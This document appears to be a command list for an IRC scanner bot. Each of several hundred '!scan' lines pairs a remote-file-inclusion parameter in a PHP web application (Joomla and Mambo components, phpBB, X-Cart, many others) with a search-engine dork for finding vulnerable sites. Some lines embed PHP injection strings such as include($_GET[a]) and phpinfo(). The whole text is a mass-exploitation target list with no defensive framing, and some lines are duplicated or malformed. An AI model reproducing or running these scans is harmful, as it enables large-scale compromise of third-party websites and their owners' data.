!scan /common/db.php?commonpath= "samPHPweb" "samPHPweb"
!scan errors.php?error= "samPHPweb" "samPHPweb"
!scan config.inc.php?path_escape= "XZero Community Classifieds" "XZero Community Classifieds"
!scan inc/TabStrip.php?function= "includeTab" "includeTab"
!scan /config.inc.php?path_escape= "Classifieds for our community"
!scan errors.php?error= "Classifieds for our community"
!scan /admin/spaw/spaw_control.class.php?spaw_root= "xt_conteudo" "xt_conteudo"
!scan errors.php?error= "/appserv"
!scan /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a= "index.php?name=PNphpBB2"
!scan /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a= "index.php?name=PNphpBB2"
!scan /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight= "index.php?name=PNphpBB2"
!scan /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= "com_comprofiler" "com_comprofiler"
!scan /includes/mailaccess/pop3.php?CONFIG[pear_dir]= "mailaccess"
!scan /includes/functions_portal.php?phpbb_root_path= "phpbb" "phpbb"
!scan /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf= "MakeXML4statusCounter.php" "MakeXML4statusCounter.php"
!scan /inc/cmses/aedatingCMS.php?dir%5Binc%5D= "cmses" "cmses"
!scan /import_export/pages/index.inc.php?REX[INCLUDE_PATH]= "Redaxo 2.7.4" "Redaxo 2.7.4"
!scan /faqsupport/samplefaqsupport.php?path[docroot]= "OneAdmin" "OneAdmin"
!scan /ecommerce/payment/cybersource.php?path[docroot]= "ecommerce"
!scan /doceboCms/class/class.dashboard_cms.php?where_framework= "doceboCms" "doceboCms"
!scan /config/dbutil.bck.php?confdir= "/config/dbutil.bck.php"
!scan /config.inc.php?config%5broot_dir%5d= "CLASSIFIEDS"
!scan /claroline/tracking/userLog.php?rootSys= /claroline/ /claroline/
!scan /claroline/phpbb/page_tail.php?includePath= /claroline/ /claroline/
!scan /citywriter/head.php?path= /citywriter/
!scan /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D= /bookmark4u/ /bookmark4u/
!scan /atom.php5?page= "atom.php5?page="
!scan /ashnews.php?pathtoashnews= "pathtoashnews"
!scan /newspublish/include.php?path%5Bdocroot%5D= "newspublish"
!scan /agendax/addevent.inc.php?agendax_path= /agendax/
!scan /PHP_CON/Exchange/include.php?webappcfg[APPPATH]= "PHP-CON v1.3" "PHP-CON v1.3"
!scan /Neos_Chronos/header.php?base_folder= /Neos_Chronos/ /Neos_Chronos/
!scan /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path= "com_chronocontact" "com_chronocontact"
!scan /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]= /mwchat/ /mwchat/
!scan /%5Cecommerce%5Cpapyment%5Ccybersource.php?path[docroot]= "Cecommerce" "Cecommerce"
!scan /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path= /excelwriter/ /excelwriter/
!scan /inc/download_center_lite.inc.php?script_root= "Download Center Lite"
!scan /encapscms_PATH/core/core.php?root= "encapscms 0.3.6" "encapscms 0.3.6"
!scan /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path= "com_thopper"
!scan /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path= "com_pccookbook"
!scan /admin/business_inc/saveserver.php?thisdir= "saveserver.php"
!scan /admin/classes/TplLoad.php?full_path_to_public_program= "TplLoad.php"
!scan /PhpLinkExchange/bits_listings.php?svr_rootP= /PhpLinkExchange/
!scan /PNphpBB2/includes/functions_admin.php?phpbb_root_path= /PNphpBB2/
!scan /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path= "com_mambowiki"
!scan /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path= "com_mambots"
!scan /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path= "com_mambatstaff"
!scan /index.php?option=com_magazine&Itemid=&mosConfig_absolute_path= "com_magazine"
!scan /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path= "com_lurm_constructor"
!scan /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path= "com_loudmounth"
!scan /index.php?option=com_log&Itemid=&mosConfig_absolute_path= "com_log"
!scan /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path= "com_lmo"
!scan /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path= "com_linkdirectory"
!scan /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path= "com_kochsuite"
!scan /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path= "com_jreactions"
!scan /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path= "com_loudmounth"
!scan /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path= "com_dbquery"
!scan /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path= "com_datsogallery"
!scan /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path= "com_bayesiannaivefilter"
!scan /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR= /xoopsgallery/ /xoopsgallery/
!scan /skin/zero_vote/error.php?dir= "zeroboard"
!scan /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path= "/mambots/content/" "/mambots/content/"
!scan /drupal/?_menu[callbacks][1][callback]= "drupal"
!scan /config.inc.php?path_escape= "Powered by SNETWORKS PHP CLASSIFIEDS"
!scan /?mosConfig_absolute_path= "Joomla" "Joomla"
!scan /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]= "index.php?autoLoadConfig"
!scan /skin/zero_vote/ask_password.php?dir= "zeroboard" net "zeroboard" uk
!scan classes/core/language.php?rootdir= "LimeSurvey"
!scan classes/core/language.php?rootdir= "You have not provided a survey identification number"
!scan PHPDJ_v05/dj/djpage.php?page= allintext:"PHPDJ was created by www.php-mania.co.uk"
!scan /inc/cmses/aedating4CMS.php?dir[inc]= inurl:flashchat
!scan /photoalb/lib/static/header.php?set_menu= allintitle:iPhotoAlbum
!scan index.php?redir= inurl:"index.php?redir="
!scan /phpopenchat/contrib/yabbse/poc.php?sourcedir= intitle:PHPOpenChat ext:php
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:"us/index.php?option=com_remository
!scan inc/functions.inc.php?config[ppa_root_path]= "Index - Albums" inurl:index.php
!scan inc/cmses/aedatingCMS.php?dir[inc]= allinurl:"cmses"
!scan phphtml.php?htmlclass_path= phphtml.php
!scan /phpsecurityadmin/include/logout.php?PSA_PATH= "PHPSecurityAdmin"
!scan components/com_colorlab/admin.color.php?mosConfig_live_site= com_colorlab
!scan /poll/comments.php?id={${include($ddd)}}{${exit()}}&ddd= "Advanced Poll"
!scan active/components/xmlrpc/client.php?c[components]= "Pindorama"
!scan apps/apps.php?app= WebDesktop
!scan nuseo/admin/nuseo_admin_d.php?nuseo_dir= "NuSEO PHP"
!scan drupal/?_menu[callbacks][1][callback]= Drupal
!scan tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title= TikiWiki
!scan administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path= com_jcs
!scan administrator/components/com_jcs/view/register.php?mosConfig_absolute_path= com_jcs
!scan components/com_mp3_allopass/allopass.php?mosConfig_live_site= com_mp3_allopass
!scan scan administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path= "com_jcs"
!scan /modules/coppermine/themes/default/theme.php?THEME_DIR= ""Powered by Coppermine"
!scan /default.php?page=home inurl:"/default.php?page=home"
!scan /default.php?page= inurl:"/default.php?page=home"
!scan /PhpLinkExchange/bits_listings.php?svr_rootPhpStart= inurl:PhpLinkExchange
!scan /openi-admin/base/fileloader.php?config[openi_dir]= Powered by OPENi-CMS
!scan /components/com_mp3_allopass/allopass.php?mosConfig_live_site=
!scan /components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=
!scan index.php?root_path= "powered by Open Bulletin Board"
!scan config.php?fpath= "Powered By PUMA"
!scan /index.php?classified_path= "Vivvo Article Manager"
!scan index.php?base= powered by MyABraCaDaWeb
!scan pop.php?base= powered by MyABraCaDaWeb
!scan extras/ext_cats.php?dir_path= photokorn 1.52
!scan content/article.php?ide= inurl:WM-News
!scan content/modify_go.php?pwfile= inurl:WM-News
!scan protection.php?action=logout&siteurl= allinurl%3Amembers.php%3Fid%3Dall+site%3Anet
!scan /inc/header.php/step_one.php?server_inc= step_one.php?sid
!scan /language/lang_english/lang_main_album.php?phpbb_root_path= "Powered by phpBB2" site:fr
!scan language/lang_english/lang_main_album.php?phpbb_admin_path= phpBB
!scan phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath= Copyright © 2007 by Horst-D. Kröller · CMS: php WCMS
!scan phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath= Copyright © 2007 by Horst-D. Kröller · CMS: php WCMS
!scan index.php?themesdir= "Segue v."+"Middlebury College"
!scan lib/base.php?BaseCfg[BaseDir]= actSite
!scan index.php?themesdir= "Segue v."+"Middlebury College"
!scan /includes/openid/Auth/OpenID/BBStore.php?openid_root_path= "phpBB"
!scan contrib/mx_glance_sdesc.php?mx_root_path= "mx_glance"
!scan contrib/mx_glance_sdesc.php?mx_root_path= "mxBB"
!scan amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]= "amember"
!scan news/newstopic_inc.php?indir= "Public Media Manager"
!scan phfito/phfito-post?SRC_PATH= "phpFidoNode"
!scan /protection.php?action=logout&siteurl= "/members.php?id=all"
!scan /appserv/main.php?appserv_root= "The AppServ Open Project"
!scan includes/archive/archive_topic.php?phpbb_root_path= IntegraMOD
!scan admin/include/header.php?repertoire= "chupix cms"
!scan forum/forum.php?view= "lustig.cms"
!scan access/login.php?path_to_root= "FrontAccounting"
!scan includes/lang/language.php?path_to_root= "FrontAccounting"
!scan dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth= "DFD Cart"
!scan dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth= "DFD Cart"
!scan dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth= "DFD Cart"
!scan show.php?file= "Helplink"
!scan data/compatible.php?module_name= "Nuke Mobile Entartainment"
!scan config.inc.php?_path= "WordSmith"
!scan modules/search/search.php?language_home=&rootdp=zZz&gsLanguage= "iziContents"
!scan modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage= "iziContents"
!scan modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage= "iziContents"
!scan modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage= "iziContents"
!scan modules/links/submit_links.php?rootdp=zZz&gsLanguage= "iziContents"
!scan modifyform.html?code= modifyform
!scan Encoder.php?base_dir= phpsyncml
!scan Decoder.php?base_dir= phpsyncml
!scan administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site= "com_joom12pic"
!scan phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT= "phpFFL"
!scan phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT= "phpFFL"
!scan afb-3-beta-2007-08-28/_includes/settings.inc.php?approot= "Ajax File Browser"
!scan administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site= inurl:"com_joomlaradiov5"
!scan config.php?xcart_dir= "X-CART. Powerful PHP shopping cart software"
!scan prepare.php?xcart_dir= "X-CART. Powerful PHP shopping cart software"
!scan smarty.php?xcart_dir= "X-CART. Powerful PHP shopping cart software"
!scan customer/product.php?xcart_dir= "X-CART. Powerful PHP shopping cart software"
!scan provider/auth.php?xcart_dir= "X-CART. Powerful PHP shopping cart software"
!scan admin/auth.php?xcart_dir= "X-CART. Powerful PHP shopping cart software"
!scan NuclearBB/tasks/send_queued_emails.php?root_path= NuclearBB
!scan protection.php?action=logout&siteurl= "Site Layout & Graphics"
!scan protection.php?action=logout&siteurl= statcounter
!scan protection.php?action=logout&siteurl= "PHPFanBase"
!scan manager/admin/index.php?MGR= "phpRealty"
!scan manager/admin/p_ins.php?MGR= "phpRealty"
!scan manager/admin/u_ins.php?MGR= "phpRealty"
!scan source/mod/rss/viewitem.php?Codebase= ED Engine
!scan source/mod/rss/view.php?Codebase= ED Engine
!scan source/mod/rss/post.php?Codebase= ED Engine
!scan source/mod/rss/channeledit.php?Codebase= WebEd
!scan joomla/index.php?option=com_restaurante&task= "/index.php?option=com_restaurante"
!scan modules/addons/plugin.php?doc_root= "txx cms"
!scan modules/addons/plugin.php?doc_root= inurl:addons
!scan modules/Discipline/CategoryBreakdownTime.php?FocusPath= inurl:Discipline
!scan modules/Discipline/CategoryBreakdownTime.php?staticpath= inurl:Discipline
!scan modules/Discipline/StudentFieldBreakdown.php?staticpath= inurl:Discipline
!scan lib/functions.php?DOC_ROOT= "Online Fantasy Football League"
!scan lib/header.php?DOC_ROOT= "Online Fantasy Football League"
!scan menu.php?functions_file= phpMytourney
!scan environment.php?DIR_PREFIX= AnyInventory
!scan dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH= Phpof
!scan stphpapplication.php?STPHPLIB_DIR= SpeedTech PHP Library
!scan senetman/html/index.php?page= eNetman
!scan es_desp.php?files_dir= Weblogicnet
!scan es_custom_menu.php?files_dir= Weblogicnet
!scan es_offer.php?files_dir= Weblogicnet
!scan stphpbtnimage.php?STPHPLIB_DIR= SpeedTech PHP Library
!scan stphpform.php?STPHPLIB_DIR= SpeedTech PHP Library
!scan stphpapplication.php?STPHPLIB_DIR= "stph"
!scan stphpbtnimage.php?STPHPLIB_DIR= "stph"
!scan stphpform.php?STPHPLIB_DIR= "stph"
!scan senetman/html/index.php?page= "senetman"
!scan /intern/admin/other/backup.php?admin=1&rootdir= "phpBG"
!scan /intern/admin/?rootdir= "phpBG"
!scan /intern/clan/member_add.php?rootdir= "phpBG"
!scan /intern/config/key_2.php?rootdir= "phpBG"
!scan /intern/config/forum.php?rootdir= "phpBG"
!scan xGB.php?act=admin&do= allinurl:"xGb.php"
!scan modules/vwar/convert/mvcw_conver.php?step=1&vwar_root= "mvcw_conver.php"
!scan convert/mvcw.php?vwar_root= "convert/mvcw.php"
!scan convert/mvcw.php?step=1&vwar_root= "convert/mvcw.php"
!scan public_includes/pub_blocks/activecontent.php?vsDragonRootPath= inurl:activecontent.php
!scan public_includes/pub_blocks/activecontent.php?vsDragonRootPath= "Php Blue Dragon"
!scan ncaster/admin/addons/archive/archive.php?adminfolder= inurl:ncaster
!scan ncaster/admin/addons/archive/archive.php?adminfolder= Ncaster 1.7.2
!scan /chat/inc/cmses/aedating4CMS.php?dir[inc]= inurl:flashchat site:.ru
!scan database.php?mosConfig_absolute_path= "powered by mambo"
!scan config.php?path_to_root= inurl:"path_to_root"
!scan order/login.php?svr_rootscript= "order?page=plan_show"
!scan admin/inc/change_action.php?format_menue= "PHPNews Version 0.93"
!scan order/login.php?svr_rootscript= "order?page=plan_show"
!scan /include.php?path[docroot]= inurl:"newspublish"
!scan newsletter/newsletter.php?waroot= inurl:newsletter.php?
!scan mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]= inurl:mediagallery/
!scan beacon/language/1/splash.lang.php?languagePath= inurl:/beacon/
!scan common/func.php?CommonAbsDir= inurl: func.php?
!scan /surveys/survey.inc.php?path= inurl:surveys
!scan index.php?body= inurl:"index.php?body="
!scan /classes/adodbt/sql.php?classes_dir= allinurl:adobt site:pl
!scan enc/content.php?Home_Path= "powered by doodle cart"
!scan /classified_right.php?language_dir= inurl:classified.php phpbazar
!scan /sources/functions.php?CONFIG[main_path]= "(Powered By ScozNews)"
!scan /sources/template.php?CONFIG[main_path]= "(Powered By ScozNews)"
!scan /embed/day.php?path= intitle:"Login to Calendar"
!scan /includes/dbal.php?eqdkp_root_path= "powered by EQdkp"
!scan /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= "Powered By Aardvark Topsites PHP 4.2.2"
!scan /includes/kb_constants.php?module_root_path= "Powered by Knowledge Base"
!scan /mcf.php?content= allinurl:"mcf.php" site:.de
!scan /components/com_facileforms/facileforms.frame.php?ff_compath= allinurl:"com_facileforms" site:.org
!scan skins/advanced/advanced1.php?pluginpath[0]= "Sabdrimer CMS"
!scan /zipndownload.php?PP_PATH= "Powered by: PhotoPost PHP 4.6"
!scan /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path= inurl:"com_serverstat"
!scan /components/com_zoom/includes/database.php?mosConfig_absolute_path= inurl:"index.php?option="com_zoom"
!scan /main.php?sayfa= inurl:"main.php?sayfa="
!scan /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= allinurl:com_extended_registration
!scan /addpost_newpoll.php?addpoll=preview&thispath= allinurl:"/ubbthreads/"
!scan /header.php?abspath= "MobilePublisherPHP"
!scan components/com_performs/performs.php?mosConfig_absolute_path= inurl:"com_performs"
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:index.php?option=com_remository
!scan impex/ImpExData.php?systempath= intext:powered by vbulletin
!scan /modules/vwar/admin/admin.php?vwar_root= allinurl:vwar site:.com
!scan /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= "powered by phpCOIN"
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:.com/index.php?option=com_remository
!scan /tools/send_reminders.php?includedir= allinurl:day.php?date=
!scan /skin/zero_vote/error.php?dir= skin/zero_vote/error.php
!scan /modules/TotalCalendar/about.php?inc_dir= allinurl:/TotalCalendar
!scan /login.php?dir= allinurl:login.php?dir=
!scan /tags.php?BBCodeFile= intitle:"Tagger LE" inurl:tags.php
!scan index.php?pageurl= inurl:"index.php?pageurl=*.php"
!scan /templates/headline_temp.php?nst_inc= "fusion news management system"
!scan index.php?var= inurl:"index.php?var=*.php"
!scan index.php?pagina= inurl:"index.php?pagina=*.php"
!scan index.php?go= inurl:"index.php?go="
!scan index.php?site= inurl:"index.php?site="
!scan phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= inurl:"phpwcms/index.php?id="
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:".com.*/index.php?option=com_comprofiler"
!scan index.php?pagina= inurl:"index.php?pagina=*.php"
!scan index.php?id= inurl:"index.php?id=*.php"
!scan index1.php?= inurl:"index1.php?=*.php?
!scan index.php?site= inurl:"index.php?site=*.php"
!scan main.php?id= inurl:"main.php?id=*.php"
!scan content.php?page= inurl:"content.php?page=*.php"
!scan admin.php?page= inurl:"admin.php?page=*.php"
!scan lib/gore.php?libpath= inurl:"/SQuery/"
!scan SQuery/lib/gore.php?libpath= inurl:"/SQuery/"
!scan index2.php?p= inurl:"index2.php?p=*.php"
!scan index1.php?go= inurl:"index1.php?go=*.php"
!scan news_detail.php?file= inurl:"news_detail.php?file=*.php"
!scan old_reports.php?file= inurl:"old_reports.php?file=*.php"
!scan index.php?x= inurl:"index.php?x=*.php"
!scan index.php?nic= inurl:"index.php?nic=*.php"
!scan homepage.php?sel= inurl:"homepage.php?sel=*.php"
!scan index.php?sel= inurl:"index.php?sel=*.php"
!scan main.php?x= inurl:"main.php?x=*.php"
!scan components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path= "inurl:com_artlinks"
!scan index2.php?x= inurl:index2.php?x=*.php"
!scan main.php?pagina= inurl:"main.php?pagina=*.php"
!scan test.php?page= allinurl:test.php?page=
!scan components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= "inurl:com_phpshop"
!scan akocomments.php?mosConfig_absolute_path= inurl:akocomments.php
!scan index.php?page= inurl:"edu/index.php?page=*.php"
!scan *.php?page= inurl:*.php?page=*.php"
!scan index.php?oldal= inurl:"index.php?oldal=*.php"
!scan index.php?lang=gr&file inurl:"index.php?lang=gr&file=*.php"
!scan index.php?pag= inurl:"index.php?pag=*.php"
!scan index.php?incl= inurl:"index.php?incl="
!scan avatar.php?page= inurl:"avatar.php?page="
!scan index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= "Mambo is A Free
!scan index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= "Mambo is"
!scan ndex.php?p= inurl:"edu/index.php?p=*.php"
!scan /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:/xgallery/
!scan index.php?x= inurl:"com/index.php?x=*.php"
!scan index.php?mode= inurl:"com/index.php?mode=*.php"
!scan index.php?stranica= inurl:"index.php?stranica="
!scan index.php?sub= inurl:"il/index.php?sub=*.php"
!scan index.php?id= inurl:"/index.php?id=*.php"
!scan index.php?t= inurl:"/index.php?t=*.php"
!scan index.php?r= inurl:"index.php?r=*.php"
!scan index.php?menu= inurl:"net/index.php?menu=*.php"
!scan index.php?pag= inurl:"com/index.php?pag=*.php"
!scan solpot.html?body= allinurl: "solpot.html?body"
!scan port.php?content= inurl:port.php?content=*.php"
!scan index0.php?show= inurl:index0.php?show=*.php"
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:/index.php?option=com_comprofiler"
!scan /tools/send_reminders.php?includedir= allinurl:day.php?date= inurl:/day.php?date=
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:/index.php?option=com_remository
!scan /tags.php?BBCodeFile= intitle:"Tagger LE" inurl:tags.php site:br
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:/index.php?option=com_comprofiler"
!scan content.php?page= inurl:"*content.php?page=*.php"
!scan index.php?topic= inurl:"/index.php?topic=*.php"
!scan index.php?u= inurl:"/index.php?u=*.php"
!scan administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path= inurl:"com_linkdirectory"
!scan administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= inurl:".tr./components"
!scan modules/My_eGallery/index.php?basepath= inurl:"My_eGallery"
!scan /modules/vwar/admin/admin.php?vwar_root= inurl:"vwar"
!scan index.php?loc= allinurl:.br/index.php?loc=
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:"us/index.php?option=com_comprofiler"
!scan administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= inurl:"com_cropimage"
!scan /tags.php?BBCodeFile= intitle:"Tagger LE" inurl:tags.php
!scan myevent.php?myevent_path= inurl:myevent.php
!scan /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path= allinurl:"com_uhp"
!scan myevent.php?myevent_path= inurl:"uk/myevent.php
!scan includes/functions.php?phpbb_root_path= powered by Integramod
!scan m2f/m2f_phpbb204.php?m2f_root_path= allinurl:/m2f_usercp.php?
!scan /tags.php?BBCodeFile= intitle:"Tagger LE" inurl:"uk/tags.php
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:"us/index.php?option=com_remository
!scan show.php?path= inurl:fclick
!scan show.php?path= inurl:.ac.uk/fclick
!scan administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path= inurl:".de.*/com_linkdirectory"
!scan administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site= inurl:"com_a6mambocredits"
!scan index.php?template= inurl:"index.php?"
!scan search.php?cutepath= inurl:"search.php?"
!scan show_news.php?cutepath= inurl:"show_news.php?"
!scan page.php?doc= allinurl:"page.php?doc="
!scan administrator/components/com_webring/admin.webring.docs.php?component_dir= inurl:"com_webring"
!scan administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path= inurl:".de.*/com_mgm"
!scan help.php?css_path= inurl:phplive site:.ru
!scan components/com_galleria/galleria.html.php?mosConfig_absolute_path= inurl:"com_galleria/"
!scan big.php?pathtotemplate= inurl:".de.*"big.php?"
!scan includes/search.php?GlobalSettings[templatesDirectory]= inurl:".com"search.php?"
!scan interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include= "Papoo CMS"
!scan /functions.php?include_path= "powered by: phpecard"
!scan modules/My_eGallery/index.php?basepath= inurl:".de.*"My_eGallery"
!scan components/com_galleria/galleria.html.php?mosConfig_absolute_path= inurl:".net.*"com_galleria/"
!scan /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= "powered by CubeCart 3.0.6"
!scan /class.mysql.php?path_to_bt_dir= "powered by paBugs 2.0 Beta 3"
!scan /include/footer.inc.php?_AMLconfig[cfg_serverpath]= "powered by AllMyLinks"
!scan /squirrelcart/cart_content.php?cart_isp_root= allinurl:/squirrelcart/
!scan index2.php?to= inurl:"/index2.php?to=*.php"
!scan index.php?load= inurl:"/index.php?load=*.php"
!scan home.php?pagina= inurl:"home.php?pagina="
!scan /modules/coppermine/include/init.inc.php?CPG_M_DIR= allinurl:modules.php?name=coppermine
!scan /modules/Forums/admin/admin_styles.php?phpbb_root_path= allinurl:modules.php?name=forums
!scan /modules/vwar/admin/admin.php?vwar_root= allinurl:modules.php?name=vwar
!scan /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path= allinurl:modules.php?name=PNphpBB2
!scan /modules/My_eGallery/public/displayCategory.php?basepath= allinurl:modules.php?name=my_egallery
!scan /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:modules.php?name=xgallery
!scan /modules/4nAlbum/public/displayCategory.php?basepath= allinurl:modules.php?name=4nAlbum
!scan /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:/xoopsgallery/
!scan /modules/agendax/addevent.inc.php?agendax_path= allinurl:/agendax/
!scan /include/main.php?config[search_disp]=true&include_dir= allinurl:/osticket/
!scan /contrib/yabbse/poc.php?poc_root_path= ntitle:PHPOpenChat ext:php
!scan /phpopenchat/contrib/yabbse/poc.php?sourcedir= ntitle:PHPOpenChat ext:php
!scan /photoalb/lib/static/header.php?set_menu= allintitle:iPhotoAlbum
!scan /squito/photolist.inc.php?photoroot= "Squitosoft All Rights Reserved"
!scan /bz/squito/photolist.inc.php?photoroot= "Squitosoft All Rights Reserved"
!scan /ppa/inc/functions.inc.php?config[ppa_root_path]= allinurl:**/screens/displayimage.php?pid=*
!scan /spid/lang/lang.php?lang_path= allinurl:**/spid.php allinurl:**/spid.php?cat=*lang=
!scan /classes.php?LOCAL_PATH= "powered by siteframe"
!scan al_initialize.php?alpath= "Powered by AutoLinks Pro"
!scan /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]= allinurl:*br*/newbb_plus/*
!scan /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= "Powered by Mambo" inurl:*gov*
!scan /extensions/moblog/moblog_lib.php?basedir= "powered by pivot"
!scan /app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH= "phpCodeGenie v. 3.0.2"
!scan components/com_performs/performs.php?mosConfig_absolute_path= inurl:"com_performs"
!scan modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= inurl:"AllMyGuests"
!scan /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path= allinurl:"com_rsgallery"
!scan /components/com_smf/smf.php?mosConfig_absolute_path= allinurl:"com_smf"
!scan /components/com_cpg/cpg.php?mosConfig_absolute_path= index.php?option=com_cpg
!scan administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path= inurl:"com_peoplebook"
!scan /admin_modules/admin_module_deldir.inc.php?config[path_src_include]= "Powered by yappa-ng 2.3.1"
!scan inc/cmses/aedating4CMS.php?dir[inc]= inurl:flashchat site:br bp_ncom.php?bnrep= "Script r?alis? par BinGo PHP"
!scan /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path= inurl:"/com_mtree/"
!scan /jscript.php?my_ms[root]= intitle:"myspeach" inurl:"chat_exemple.php"
!scan /popup_window.php?site_isp_root= inurl:"Squirrelcart"
!scan /yabbse/Sources/Packages.php?sourcedir= inurl:Yabbse
!scan /include/main.php?config[search_disp]=true&include_dir= allinurl:/osticket/ site:fr
!scan /include/main.php?config[search_disp]=true&include_dir= allinurl:/osticket/ site:uk
!scan /includes/functions_portal.php?phpbb_root_path= "powered by Integramod"
!scan historytemplate.php?cms[support]=1&cms[tngpath]= "powered by The Next Generation of Genealogy Sitebuilding"
!scan /components/com_simpleboard/image_upload.php?sbp= inurl:"com_simpleboard"